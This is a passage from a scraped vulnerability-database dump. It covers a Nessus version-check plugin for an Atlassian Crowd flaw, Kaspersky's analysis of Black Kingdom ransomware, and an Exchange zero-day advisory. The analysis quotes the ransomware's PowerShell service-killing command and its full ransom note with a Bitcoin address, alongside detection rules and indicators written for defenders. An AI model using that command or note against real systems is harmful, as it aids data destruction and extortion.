3.0.5, 3.1.x prior to 3.1.6, 3.2.x prior to 3.2.8, 3.3.x prior to 3.3.5 \nor 3.4.x prior to 3.4.4. It is, therefore, affected by a remote code execution\n(RCE) vulnerability. An unauthenticated, remote attacker can exploit this, by\nusing pdkinstall development plugin, to install arbitrary plugins, which permits\nremote code execution.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n # https://confluence.atlassian.com/crowd/crowd-security-advisory-2019-05-22-970260700.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f66fbb1c\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 3.0.5, 3.1.6, 3.2.8, 3.3.5, 3.4.4 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-11580\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Atlassian Crowd pdkinstall Unauthenticated Plugin Upload RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/05/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:atlassian:crowd\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"crowd_detect.nasl\", \"os_fingerprint.nasl\");\n script_require_keys(\"www/crowd\");\n script_require_ports(\"Services/www\", 8095);\n\n exit(0);\n}\n\ninclude(\"http.inc\");\ninclude(\"vcf.inc\");\n\nport = get_http_port(default:8095);\n\napp = \"crowd\";\n\napp_info = vcf::get_app_info(app:app, port:port, webapp:TRUE);\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [\n { \"min_version\" : \"2.1.0\", \"fixed_version\" : \"3.0.5\" },\n { \"min_version\" : \"3.1.0\", \"fixed_version\" : \"3.1.6\" },\n { \"min_version\" : \"3.2.0\", \"fixed_version\" : \"3.2.8\" },\n { \"min_version\" : \"3.3.0\", \"fixed_version\" : \"3.3.5\" },\n { \"min_version\" : \"3.4.0\", \"fixed_version\" : \"3.4.4\" }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "securelist": [{"lastseen": "2021-06-17T10:31:39", "description": "\n\nBlack Kingdom ransomware appeared on the scene back in 2019, but we observed some activity again in 2021. The ransomware was used by an unknown adversary for exploiting a Microsoft Exchange vulnerability (CVE-2021-27065).\n\nThe complexity and sophistication of the Black Kingdom family cannot bear a comparison with other Ransomware-as-a-Service (RaaS) or Big Game Hunting (BGH) families. The ransomware is coded in Python and compiled to an executable using PyInstaller; it supports two encryption modes: one generated dynamically and one using a hardcoded key. Code analysis revealed an amateurish development cycle and a possibility to recover files encrypted with Black Kingdom with the help of the hardcoded key. The industry already [provided a script](<https://blog.cyberint.com/black-kingdom-ransomware>) to recover encrypted files in case they were encrypted with the embedded key.\n\n## Background\n\nThe use of a ransomware family dubbed Black Kingdom in a campaign that exploited the CVE-2021-27065 Microsoft Exchange vulnerability known as [ProxyLogon](<https://proxylogon.com/>) was [publicly reported](<https://twitter.com/vikas891/status/1373282066603859969>) at the end of March.\n\nAround the same time, we published a story on another ransomware family used by the attackers after successfully exploiting vulnerabilities in Microsoft Exchange Server. The ransomware family was DearCry.\n\nAnalysis of Black Kingdom revealed that, compared to others, it is an amateurish implementation with several mistakes and a critical encryption flaw that could allow decrypting the files due to the use of a hardcoded key. Black Kingdom is not a new player: it was observed in action following other vulnerability exploitations in 2020, such as CVE-2019-11510.\n\n**Date** | **CVE** | **Product affected** \n---|---|--- \nJune 2020 | CVE-2019-11510 | Pulse Secure \nMarch 2021 | CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065 | Microsoft Exchange Server \n \n## Technical analysis\n\n### Delivery methods\n\nBlack Kingdom's past activity indicates that ransomware was used in larger vulnerability exploitations campaigns related to Pulse Secure or Microsoft Exchange. [Public reports](<https://twitter.com/malwaretechblog/status/1373648027609657345>) indicated that the adversary behind the campaign, after successfully exploiting the vulnerability, installed a webshell in the compromised system. The webshell enabled the attacker to execute arbitrary commands, such as a PowerShell script for downloading and running the Black Kingdom executable.\n\n### Sleep parameters\n\nThe ransomware can be executed without parameters and will start to encrypt the system, however, it is possible to to run Black Kingdom with a number value, which it will interpret as the number of seconds to wait before starting encryption.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16141438/BlackKingdom_ransomware_01.png>)\n\n**_'Sleep' parameter used as an argument_**\n\n### Ransomware is written in Python\n\nBlack Kingdom is coded in Python and compiled to an executable using PyInstaller. While analyzing the code statically, we found that most of the ransomware logic was coded into a file named _0xfff.py_. The ransomware is written in Python 3.7.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16141523/BlackKingdom_ransomware_02.png>)\n\n**_Black Kingdom is coded in Python_**\n\n### Excluded directories\n\nThe adversary behind Black Kingdom specified certain folders to be excluded from encryption. The purpose is to avoid breaking the system during encryption. The list of excluded folders is available in the code:\n\n * Windows,\n * ProgramData,\n * Program Files,\n * Program Files (x86),\n * AppData/Roaming,\n * AppData/LocalLow,\n * AppData/Local.\n\nThe code that implements this functionality demonstrates how amateurishly Black Kingdom is written. The developers failed to use OS environments or regex to avoid repeating the code twice.\n\n### PowerShell command for process termination and history deletion\n\nPrior to file encryption, Black Kingdom uses PowerShell to try to stop all processes in the system that contain "sql" in the name with the following command:\n \n \n Get-Service*sql*|Stop-Service-Force2>$null\n\nOnce done, Black Kingdom will delete the PowerShell history in the system.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16141650/BlackKingdom_ransomware_03.png>)\n\n**_PowerShell commands run by Black Kingdom_**\n\nCombined with a cleanup of system logs, this supports the theory that the attackers try to remain hidden in the system by removing all traces of their activity.\n\n### Encryption process\n\nThe static analysis of Black Kingdom shows how it generates an AES-256 key based on the following algorithm.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16141733/BlackKingdom_ransomware_04.png>)\n\n**_The pseudo-algorithm used by Black Kingdom_**\n\nThe malware generates a 64-character pseudo-random string. It then takes the MD5 hash of the string and uses it as the key for AES-256 encryption.\n\nThe code contains credentials for sending the generated key to the third-party service hxxp://mega.io. If the connection is unsuccessful, the Black Kingdom encrypts the data with a hardcoded key available in the code.\n\nBelow is an example of a successful connection with hxxp://mega.io.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16141817/BlackKingdom_ransomware_05.png>)\n\n**_Connection established with mega.io_**\n\n** **The credentials for mega.io are hardcoded in base64 and used for connecting as shown below.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16143025/BlackKingdom_ransomware_06.png>)\n\n**_Hardcoded credentials_**\n\nThe file sent to Mega contained the following data.\n\n**Parameter** | **Description:** \n---|--- \nID: | Generated ID for user identification \nKey: | Generated user key \nUser: | Username in the infected system \nDomain: | Domain name to which the infected user belongs \n \nBlack Kingdom will encrypt a single file if it is passed as a parameter with the key to encrypt it. This could allow the attacker to encrypt one file instead of encrypting the entire system.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16143102/BlackKingdom_ransomware_07.png>)\n\n**_Function for encrypting a single file_**\n\nIf no arguments are used, the ransomware will start to enumerate files in the system and then encrypt these with a ten-threaded process. It performs the following basic operations:\n\n 1. Read the file,\n 2. Overwrite it with an encrypted version,\n 3. Rename the file.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16143137/BlackKingdom_ransomware_08.png>)\n\n**_The function used for encrypting the system_**\n\nBlack Kingdom allows reading a file in the same directory called target.txt, which will be used by the ransomware to recursively collect files for the collected directories specified in that file and then encrypt them. Black Kingdom will also enumerate various drive letters and encrypt them. A rescue note will be delivered for each encrypted directory.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16143222/BlackKingdom_ransomware_09.png>)\n\n**_Rescue note used by the ransomware_**\n\n### Encryption mistakes\n\nAmateur ransomware developers often end up making mistakes that can help decryption, e.g., poor implementation of the encryption key, or, conversely, make recovery impossible even after the victim pays for a valid decryptor. Black Kingdom will try to upload the generated key to Mega, and if this fails, use a hardcoded key to encrypt the files. If the files have been encrypted and the system has not been able to make a connection to Mega, it will be possible to recover the files using the hardcoded keys.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16143256/BlackKingdom_ransomware_10.png>)\n\n**_Hardcoded key in Base64_**\n\nWhile analyzing the code statically, we examined the author's implementation of file encryption and found several mistakes that could affect victims directly. During the encryption process, Black Kingdom does not check whether the file is already encrypted or not. Other popular ransomware families normally add a specific extension or a marker to all encrypted files. However, if the system has been infected by Black Kingdom twice, files in the system will be encrypted twice, too, which may prevent recovery with a valid encryption key.\n\n### System log cleanup\n\nA feature of Black Kingdom is the ability to clean up system logs with a single Python function.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16143334/BlackKingdom_ransomware_11.png>)\n\n**_The function that cleans up system logs_**\n\nThis operation will result in Application, Security, and System event viewer logs being deleted. The purpose is to remove any history of ransomware activity, exploitation, and privilege escalation.\n\n### Ransomware note\n\nBlack Kingdom changes the desktop background to a note that the system is infected while it encrypts files, disabling the mouse and keyboard with pyHook as it does so.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16143409/BlackKingdom_ransomware_12.png>)\n\n**_Function to hook the mouse and keyboard_**\n\nWritten in English, the note contains several mistakes. All Black Kingdom notes contain the same Bitcoin address; sets it apart from other ransomware families, which provide a unique address to each victim.\n \n \n ***************************\n | We Are Back ?\n ***************************\n \n We hacked your (( Network )), and now all files, documents, images,\n databases and other important data are safely encrypted using the strongest algorithms ever.\n You cannot access any of your files or services .\n But do not worry. You can restore everthing and get back business very soon ( depends on your actions )\n \n before I tell how you can restore your data, you have to know certain things :\n \n We have downloaded most of your data ( especially important data ) , and if you don't contact us within 2 days, your data will be released to the public.\n \n To see what happens to those who didn't contact us, just google : ( Blackkingdom Ransomware )\n \n ***************************\n | What guarantees ?\n ***************************\n \n We understand your stress and anxiety. So you have a free opportunity to test our service by instantly decrypting one or two files for free\n just send the files you want to decrypt to (support_blackkingdom2@protonmail.com\n \n ***************************************************\n | How to contact us and recover all of your files ?\n ***************************************************\n \n The only way to recover your files and protect from data leaks, is to purchase a unique private key for you that we only posses .\n \n \n [ + ] Instructions:\n \n 1- Send the decrypt_file.txt file to the following email ===> support_blackkingdom2@protonmail.com\n \n 2- send the following amount of US dollars ( 10,000 ) worth of bitcoin to this address :\n \n [ 1Lf8ZzcEhhRiXpk6YNQFpCJcUisiXb34FT ]\n \n 3- confirm your payment by sending the transfer url to our email address\n \n 4- After you submit the payment, the data will be removed from our servers, and the decoder will be given to you,\n so that you can recover all your files.\n \n ## Note ##\n \n Dear system administrators, do not think you can handle it on your own. Notify your supervisors as soon as possible.\n By hiding the truth and not communicating with us, what happened will be published on social media and yet in news websites.\n \n Your ID ==>\n FDHJ91CUSzXTquLpqAnP\n\nThe associated Bitcoin address is currently showing just two transactions.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16143451/BlackKingdom_ransomware_13.png>)\n\n**_Transactions made to a Bitcoin account_**\n\n### Code analysis\n\nAfter decompiling the Python code, we found that the code base for Black Kingdom has its origins in an open-source ransomware builder [available on Github](<https://github.com/BuchiDen/Ransomware_RAASNet/blob/master/RAASNet.py>).\n\nThe adversary behind Black Kingdom adapted parts of the code, adding features that were not originally presented in the builder, such as the hardcoded key or communication with the mega.io domain.\n\n## Victims\n\nBased on our telemetry we could see only a few hits by Black Kingdom in Italy and Japan.\n\n## Attribution\n\nWe could not attribute Black Kingdom to any known adversary in our case analysis. Its involvement in the Microsoft Exchange exploitation campaign suggests opportunism, rather than a resurgence in activity from this ransomware family.\n\nFor more information please contact: [financialintel@kaspersky.com](<mailto:financialintel@kaspersky.com>)\n\n## Appendix I \u2013 Indicators of Compromise\n\n**_Note:_**_ The indicators in this section were valid at the time of publication. Any future changes will be directly updated in the corresponding .ioc file._\n\n**File Hashes**\n\nb9dbdf11da3630f464b8daace88e11c374a642e5082850e9f10a1b09d69ff04f \nc4aa94c73a50b2deca0401f97e4202337e522be3df629b3ef91e706488b64908 \na387c3c5776ee1b61018eeb3408fa7fa7490915146078d65b95621315e8b4287 \n815d7f9d732c4d1a70cec05433b8d4de75cba1ca9caabbbe4b8cde3f176cc670 \n910fbfa8ef4ad7183c1b5bdd3c9fd1380e617ca0042b428873c48f71ddc857db \n866b1f5c5edd9f01c5ba84d02e94ae7c1f9b2196af380eed1917e8fc21acbbdc \nc25a5c14269c990c94a4a20443c4eb266318200e4d7927c163e0eaec4ede780a\n\n**Domain:**\n\nhxxp://yuuuuu44[.]com/vpn-service/$(f1)/crunchyroll-vpn\n\n**YARA rules:**\n \n \n import \"hash\"\n import \"pe\"\n rule ransomware_blackkingdom {\n \n meta:\n \n description = \"Rule to detect Black Kingdom ransomware\"\n author = \"Kaspersky Lab\"\n copyright = \"Kaspersky Lab\"\n distribution = \"DISTRIBUTION IS FORBIDDEN. DO NOT UPLOAD TO ANY MULTISCANNER OR SHARE ON ANY THREAT INTEL PLATFORM\"\n version = \"1.0\"\n last_modified = \"2021-05-02\"\n hash = \"866b1f5c5edd9f01c5ba84d02e94ae7c1f9b2196af380eed1917e8fc21acbbdc\"\n hash = \"910fbfa8ef4ad7183c1b5bdd3c9fd1380e617ca0042b428873c48f71ddc857db\"\n \n condition:\n \n hash.sha256(pe.rich_signature.clear_data) == \"0e7d0db29c7247ae97591751d3b6c0728aed0ec1b1f853b25fc84e75ae12b7b8\"\n }\n\n## Appendix II \u2013 MITRE ATT&CK Mapping\n\nThis table contains all TTPs identified during the analysis of the activity described in this report.\n\n**Tactic** | **Technique.** | **Technique Name. ** \n---|---|--- \n**Execution** | **T1047** | **Windows Management Instrumentation** \n**T1059** | **Command and Scripting Interpreter** \n**T1106** | **Native API** \n**Persistence** | **T1574.002** | **DLL Side-Loading** \n**T1546.011** | **Application Shimming** \n**T1547.001** | **Registry Run Keys / Startup Folder** \n**Privilege Escalation** | **T1055** | **Process Injection** \n**T1574.002** | **DLL Side-Loading** \n**T1546.011** | **Application Shimming** \n**T1134** | **Access Token Manipulation** \n**T1547.001** | **Registry Run Keys / Startup Folder** \n**Defense Evasion** | **T1562.001** | **Disable or Modify Tools** \n**T1140** | **Deobfuscate/Decode Files or Information** \n**T1497** | **Virtualization/Sandbox Evasion** \n**T1027** | **Obfuscated Files or Information** \n**T1574.002** | **DLL Side-Loading** \n**T1036** | **Masquerading** \n**T1134** | **Access Token Manipulation** \n**T1055** | **Process Injection** \n**Credential Access** | **T1056** | **Input Capture** \n**Discovery** | **T1083** | **File and Directory Discovery** \n**T1082** | **System Information Discovery** \n**T1497** | **Virtualization/Sandbox Evasion** \n**T1012** | **Query Registry** \n**T1518.001** | **Security Software Discovery** \n**T1057** | **Process Discovery** \n**T1018** | **Remote System Discovery** \n**T1016** | **System Network Configuration Discovery** \n**Collection** | **T1560** | **Archive Collected Data** \n**T1005** | **Data from Local System** \n**T1114** | **Email Collection** \n**T1056** | **Input Capture** \n**Command and Control** | **T1573** | **Encrypted Channel** \n**Impact** | **T1486** | **Data Encrypted for Impact**", "cvss3": {}, "published": "2021-06-17T10:00:41", "type": "securelist", "title": "Black Kingdom ransomware", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2019-11510", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-06-17T10:00:41", "id": "SECURELIST:DF3251CC204DECD6F24CA93B7A5701E1", "href": "https://securelist.com/black-kingdom-ransomware/102873/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-10T12:32:23", "description": "\n\n## What happened?\n\nOn March 2, 2021 several companies [released](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) [reports](<https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/>) about in-the-wild exploitation of zero-day vulnerabilities inside Microsoft Exchange Server. The following vulnerabilities allow an attacker to compromise a vulnerable Microsoft Exchange Server. As a result, an attacker will gain access to all registered email accounts, or be able to execute arbitrary code (remote code execution or RCE) within the Exchange Server context. In the latter case, the attacker will also be able to achieve persistence on the infected server.\n\nA total of four vulnerabilities were uncovered:\n\n 1. [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>). Server-side request forgery (SSRF) allows an attacker without authorization to query the server with a specially constructed request that will cause remote code execution. The exploited server will then forward the query to another destination. \n 2. [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>) caused by unsafe data deserialization inside the Unified Messaging service. Potentially allows an attacker to execute arbitrary code (RCE). As a result of insufficient control over user files, an attacker is able to forge a body of data query, and trick the high-privilege service into executing the code.\n 3. [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>). This vulnerability allows an authorized Exchange user to overwrite any existing file inside the system with their own data. To do so, the attacker has to compromise administrative credentials or exploit another vulnerability such as SSRF CVE-2021-26855.\n 4. [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>) is similar to CVE-2021-26858 and allows an authorized attacker to overwrite any system file on the Exchange server. \n\nKaspersky [Threat Intelligence](<https://www.kaspersky.com/enterprise-security/threat-intelligence>) shows that these vulnerabilities are already used by cybercriminals around the world.\n\n_Geography of attacks with mentioned MS Exchange vulnerabilities (based on KSN statistics) ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/04171325/microsoft_exchange_expoit_map.png>))_\n\nWe predict with a high degree of confidence that this is just the beginning, and we anticipate numerous exploitation attempts with the purpose of gaining access to resources inside corporate perimeters. Furthermore, we should note that there is typically a high risk of [ransomware](<https://securelist.com/targeted-ransomware-encrypting-data/99255/>) infection and/or data theft connected to such attacks. \n\n## How to protect against this threat?\n\nOur products protect against this threat with [Behavior Detection](<https://www.kaspersky.com/enterprise-security/wiki-section/products/behavior-based-protection>) and [Exploit Prevention](<https://www.kaspersky.com/enterprise-security/wiki-section/products/exploit-prevention>) components and detect exploitation with the following verdict: PDM:Exploit.Win32.Generic \nWe detect the relevant exploits with the following detection names:\n\n * Exploit.Win32.CVE-2021-26857.gen\n * HEUR:Exploit.Win32.CVE-2021-26857.a\n\nWe also detect and block the payloads (backdoors) being used in the exploitation of these vulnerabilities, according to our Threat Intelligence. Possible detection names are (but not limited to):\n\n * HEUR:Trojan.ASP.Webshell.gen\n * HEUR:Backdoor.ASP.WebShell.gen\n * UDS:DangerousObject.Multi.Generic\n\nWe are actively monitoring the situation and additional detection logic will be released with updatable databases when required.\n\nOur [Endpoint Detection and Response](<https://www.kaspersky.com/enterprise-security/endpoint-detection-response-edr>) helps to identify attacks in early stages by marking such suspicious actions with special IoA tags (and creating corresponding alerts). For example, this is an example of Powershell started by IIS Worker process (w3wp.exe) as a result of vulnerability exploitation: \n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/07094546/microsoft_exchange_expoit_edr.png>)\n\nOur [Managed Detection and Response](<https://www.kaspersky.com/enterprise-security/managed-detection-and-response>) service is also able to identify and stop this attack by using threat hunting rules to spot the exploitation itself, as well as possible payload activity.\n\nAnd the thorough research of the attack will soon be available within APT Intelligence Reporting service, please contact [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>) for details.\n\n## Recommendations\n\n * As Microsoft has already released an update to fix all these vulnerabilities, we strongly recommend updating Exchange Server as soon as possible.\n * Focus your defense strategy on detecting lateral movements and data exfiltration to the internet. Pay special attention to outgoing traffic to detect cybercriminal connections. Back up data regularly. Make sure you can quickly access it in an emergency.\n * Use solutions like [Kaspersky Endpoint Detection and Response](<https://www.kaspersky.com/enterprise-security/endpoint-detection-response-edr>) and the [Kaspersky Managed Detection and Response](<https://www.kaspersky.com/enterprise-security/managed-detection-and-response>) service which help to identify and stop the attack in the early stages, before the attackers achieve their goals.\n * Use a reliable endpoint security solution such as Kaspersky Endpoint Security for Business that is powered by exploit prevention, behavior detection and a remediation engine that is able to roll back malicious actions. KESB also has self-defense mechanisms that can prevent its removal by cybercriminals.", "cvss3": {}, "published": "2021-03-04T17:20:57", "type": "securelist", "title": "Zero-day vulnerabilities in Microsoft Exchange Server", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-04T17:20:57", "id": "SECURELIST:403B2D76CFDBDAB0862F6860A95E54B4", "href": "https://securelist.com/zero-day-vulnerabilities-in-microsoft-exchange-server/101096/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-08-07T08:03:43", "description": "\n\n[ Download full report (PDF)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/06094905/Kaspersky_Incident-Response-Analyst_2020.pdf>)\n\nAs an incident response service provider, Kaspersky delivers a global service that results in global visibility of adversaries' cyber-incident tactics and techniques used in the wild. In this report, we share our teams' conclusions and analysis based on incident responses and statistics from 2019. As well as a range of highlights, this report will cover the affected industries, the most widespread attack tactics and techniques, how long it took to detect and stop adversaries after initial entry and the most exploited vulnerabilities. The report also provides some high-level recommendations on how to increase resilience to attacks.\n\nThe insights used in this report come from incident investigations by Kaspersky teams from around the world. The main digital forensic and incident response operations unit is called the Global Emergency Response Team (GERT) and includes experts in Europe, Latin America, North America, Russia and the Middle East. The work of the Computer Incidents Investigation Unit (CIIU) and the Global Research and Analysis Team (GReAT) are also included in this report.\n\n## Executive summary\n\nIn 2019, we noticed greater commitment among victims to understand the root causes of cyberattacks and improve the level of cybersecurity within their environments to reduce the probability of similar attacks taking place again in the future.\n\nAnalysis showed that less than a quarter of received requests turned out to be false positives, mostly after security tools issued alerts about suspicious files or activity. The majority of true positive incidents were triggered by the discovery of suspicious files, followed by encrypted files, suspicious activity and alerts from security tools.\n\nMost of the incident handling requests were received from the Middle East, Europe, the CIS and Latin America, from a wide spectrum of business sectors, including industrial, financial, government, telecoms, transportation and healthcare. Industrial businesses were the most affected by cyberattacks, with oil and gas companies leading the way. They were followed by financial institutions, dominated by banks, which bore the brunt of all money theft incidents in 2019. Ransomware's presence continued in 2019 and was felt most by government bodies, telecoms and IT companies in various regions.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05105355/sl_incident_response_01.png>)\n\n### \n\n### Verticals and industries\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05105442/sl_incident_response_02.png>)\n\nAdversaries used a variety of initial vectors to compromise victims' environments. Initial vectors included exploitation, misconfiguration, insiders, leaked credentials and malicious removable media. But the most common were exploitation of unpatched vulnerabilities, malicious emails, followed by brute-force attacks.\n\n[](<https://media.kasperskycontenthub.com/wp-c
Top 30 Critical Security Vulnerabilities Most Exploited by Hackers
